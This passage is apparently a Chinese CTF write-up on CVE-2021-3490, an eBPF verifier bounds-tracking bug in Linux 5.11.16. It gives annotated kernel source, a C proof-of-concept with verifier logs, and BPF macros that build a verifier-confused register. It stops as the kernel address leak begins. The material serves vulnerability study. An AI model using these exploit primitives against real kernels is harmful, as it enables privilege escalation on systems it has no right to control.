0%

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
# Boot the challenge kernel (bzImage) with rootfs.cpio as the initrd.
# SMEP and SMAP are enabled through -cpu; kaslr and pti=on are passed on the
# kernel command line. oops=panic with panic=1, combined with -no-reboot,
# means a kernel oops ends the VM instead of rebooting it.
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, applies the kernel
# hardening sysctls, creates the flag and starts an interactive shell.

# Pseudo filesystems and device nodes
mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# Restrict kernel pointer printing and dmesg access
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
# Loopback networking
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
# Placeholder flag; mode 666 leaves it world-readable and writable
echo "flag{yhellow}" > /flag
chmod 666 /flag

# NOTE(review): setuidgid 0 starts the shell as uid 0, which looks like a
# debugging setup rather than the original challenge configuration - confirm.
setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
# Clean up and power off once the shell exits
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_value、smax_value:64 位有符号的值的可能取值边界
  • umin_value、umax_value:64 位无符号的值的可能取值边界
  • s32_min_value、s32_max_value:32 位有符号的值的可能取值边界
  • u32_min_value、u32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
/* Tracked number: what the verifier knows about each bit of a register. */
struct tnum {
u64 value; /* values of the bits that are known */
u64 mask; /* a set bit marks that bit as unknown */
};
  • mask 中为 1 的位表示该位的值不确定(unknown);mask 中为 0 的位是已确定的位,其取值由 value 中的对应位给出

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Excerpt: recompute the tracked bounds of dst_reg after a scalar ALU
 * operation with src_reg. Parts of the kernel source that the article
 * leaves out are marked with "......".
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
/* var_off is updated first; both bounds helpers below read it */
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 32-bit bounds (the vulnerable helper) */
scalar_min_max_and(dst_reg, &src_reg); /* 64-bit bounds */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
__reg_deduce_bounds(dst_reg); /* cross-check and adjust the bounds */
__reg_bound_offset(dst_reg); /* recompute var_off from the bounds */
return 0;
}

CVE 的漏洞点位于 32 位边界更新函数中:BPF_AND、BPF_OR、BPF_XOR 三类操作对应的 scalar32_min_max_and / scalar32_min_max_or / scalar32_min_max_xor 都存在同样的问题,下面以 scalar32_min_max_and 为例进行分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * Update the 32-bit bounds of dst_reg for "dst &= src". The caller has
 * already stored the AND-ed tnum in dst_reg->var_off.
 */
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Are the low 32 bits of each operand fully known (constant)? */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* Low 32 bits of dst's tnum, plus src's signed minimum and unsigned maximum */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/*
 * Both subregisters known: return without touching the 32-bit bounds and
 * rely on the 64-bit helper to set them. This is the flaw: the 64-bit
 * helper only does so when all 64 bits of both operands are known.
 */
if (src_known && dst_known)
return;

/* Minimum comes from the known bits; maximum is the smaller operand maximum */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* Either operand may be negative: give up the signed bounds (full s32 range) */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* Both non-negative: the unsigned bounds are valid signed bounds too */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Update the 64-bit bounds of dst_reg for "dst &= src". The caller has
 * already stored the AND-ed tnum in dst_reg->var_off.
 */
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Are all 64 bits of each operand known (constant)? */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* src's signed minimum and unsigned maximum */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* Both fully known: the result is a constant, so set every bound from it */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个值已经确定的寄存器:简单地调用 tnum_const 将寄存器的 var_off 设置为 known(常量),并给各个边界赋上同一个值
1
2
3
4
5
6
7
/*
 * Mark reg as holding the constant imm: zero the bytes between the type
 * field and var_off, then set var_off and every bound from imm.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
/* Set var_off and all 64-bit and 32-bit bounds of reg to the constant imm. */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
/* 64-bit bounds collapse to the single value */
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

/* 32-bit bounds come from the truncated value */
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
/* Tighten both the 32-bit and the 64-bit bounds of reg using its var_off. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Tighten the 32-bit bounds of reg using the low 32 bits of var_off.
 * Minimums can only grow (max of old and derived value) and maximums can
 * only shrink (min of old and derived value).
 */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
/* unsigned min: every unknown bit cleared */
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
/* unsigned max: every unknown bit set */
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Tighten the 64-bit bounds of reg using var_off. Minimums can only grow
 * and maximums can only shrink.
 */
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
/* unsigned min: every unknown bit cleared */
reg->umin_value = max(reg->umin_value, reg->var_off.value);
/* unsigned max: every unknown bit set */
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_and 与 scalar_min_max_and 中判断寄存器是否 known 的条件不同(前者只看低 32 位,后者看全部 64 位),导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2、R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(取 min(R2.u32_max_value=1, var_off.value | var_off.mask 的低 32 位=0))
    • R2.u32_min_value 保持为 0x1(取 max(R2.u32_min_value=1, var_off.value 的低 32 位=0))
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

/*
 * Instruction list for the verifier-log PoC. It loads map element 0 into r2,
 * keeps only the (unknown) upper 32 bits and adds 1, builds the constant
 * 0x100000002 in r3, and finally ANDs the two so that the verifier log
 * shows the inconsistent 32-bit bounds of r2.
 *
 * Every trailing comment sits BEFORE the line-continuation backslash: the
 * backslash must be the last character on the line for the macro to continue.
 */
#define POC_PROG(__map_fd) \
	/* Load value from map */ \
	BPF_LD_MAP_FD(BPF_REG_9, __map_fd),		/* r9 = map referenced by fd */ \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),		/* r1 = r9 */ \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),		/* r2 = r10 (frame pointer) */ \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),		/* r2 += -8 */ \
	BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),		/* *(r2 + 0) = 0 (key) */ \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
	/* if success, r0 will be ptr to value, 0 for failed */ \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),		/* if r0 != 0x0 goto pc+1 */ \
	BPF_EXIT_INSN(),				/* lookup failed: exit */ \
	/* load value into r2, make it part-unknown */ \
	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),	/* r2 = *(r0 + 0) */ \
	BPF_MOV64_IMM(BPF_REG_4, 0xffffffff),		/* r4 = -1 */ \
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32),		/* r4 <<= 32 */ \
	BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4),	/* r2 &= r4 */ \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1),		/* r2 += 1 */ \
	/* r3 = 0x100000002 */ \
	BPF_MOV64_IMM(BPF_REG_3, 0x1),			/* r3 = 1 */ \
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32),		/* r3 <<= 32 */ \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2),		/* r3 += 2 */ \
	/* trigger the vulnerability */ \
	BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3)	/* r2 &= r3 */


/*
 * PoC driver: create an array map, store 0 in element 0 and hand POC_PROG to
 * run_bpf_prog(). The article shows the verifier log this produces.
 * NOTE(review): the meaning of the last two run_bpf_prog() arguments is not
 * visible here - presumably they select the program type and log output.
 */
int main(int argc , char **argv, char **envp)
{
	int map_fd;
	int key = 0;
	/*
	 * Zero-initialised: the map is created with MAP_SIZE-byte values, so the
	 * update below reads far more than value[0] from this buffer.
	 */
	size_t value[0x1000] = {0};

	map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
	if (map_fd < 0) {
		err_exit("FAILED to create eBPF map!");
	}

	if (bpf_map_update_elem(map_fd, &key, value, 0) < 0) {
		err_exit("FAILED to load value into map!");
	}

	struct bpf_insn prog[] = {
		POC_PROG(map_fd),
		BPF_EXIT_INSN()
	};
	run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

	return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/* Register that carries the scalar with corrupted bounds */
#define VULN_REG    BPF_REG_6
/*
 * Look up element __idx of the map __map_fd and leave the value pointer in
 * __dst_reg; the program exits if the lookup returns 0. Uses R1, R2 and R9
 * as scratch, writes the key to fp-8 and finishes with R0 = 0.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* r9 = map referenced by __map_fd; r1 = map, r2 = &key (fp-8), key = __idx */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

/*
 * Build the scalar with inconsistent 32-bit bounds in VULN_REG, using the
 * same instruction sequence as the PoC but on VULN_REG instead of r2.
 */
#define TRIGGER_VULN(__map_fd) \
/* load map value[0] into VULN_REG, keep only its upper 32 bits, then add 1 */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* trigger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1] 、32位运行时值为 0 的寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1 做 & 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
/*
 * Wrapper object of an array map: the generic struct bpf_map header comes
 * first and the element storage sits in the trailing zero-length arrays.
 */
struct bpf_array {
struct bpf_map map; /* generic map header, embedded as the first member */
u32 elem_size;
u32 index_mask;
